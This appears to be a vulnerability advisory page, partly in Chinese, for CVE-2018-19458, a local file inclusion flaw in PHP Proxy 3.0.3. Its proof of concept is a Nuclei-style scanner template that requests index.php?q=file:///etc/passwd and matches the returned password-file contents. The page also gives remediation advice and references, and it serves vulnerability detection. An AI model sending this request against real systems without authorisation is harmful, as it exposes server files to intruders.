CVE-2018-19458: PHP Proxy 3.0.3 - Local File Inclusion

日期: 2025-08-01 | 影响软件: PHP Proxy | POC: 已公开

漏洞描述

PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246).

PoC代码[已公开]

id: CVE-2018-19458

info:
  name: PHP Proxy 3.0.3 - Local File Inclusion
  author: daffainfo
  severity: high
  description: |
    PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246).
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
  remediation: |
    Upgrade PHP Proxy to a version that is not affected by the vulnerability (3.0.4 or later) or apply the necessary patches provided by the vendor.
  reference:
    - https://www.exploit-db.com/exploits/45780
    - https://pentest.com.tr/exploits/PHP-Proxy-3-0-3-Local-File-Inclusion.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19458
    - https://www.exploit-db.com/exploits/45780/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-19458
    cwe-id: CWE-287
    epss-score: 0.79968
    epss-percentile: 0.99074
    cpe: cpe:2.3:a:php-proxy:php-proxy:3.0.3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: php-proxy
    product: php-proxy
  tags: cve,cve2018,edb,lfi,proxy,php-proxy

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?q=file:///etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022047431a4e833a9744b1551444374fa64577d2510d7c83724ce14d1d004f68505d0221009aa1c1853239b7538af3c3e71766ff1706773e9e8f06f96a7f8f48ac0eb9458d:922c64590222798bb761d5b6d8e72950

相关漏洞推荐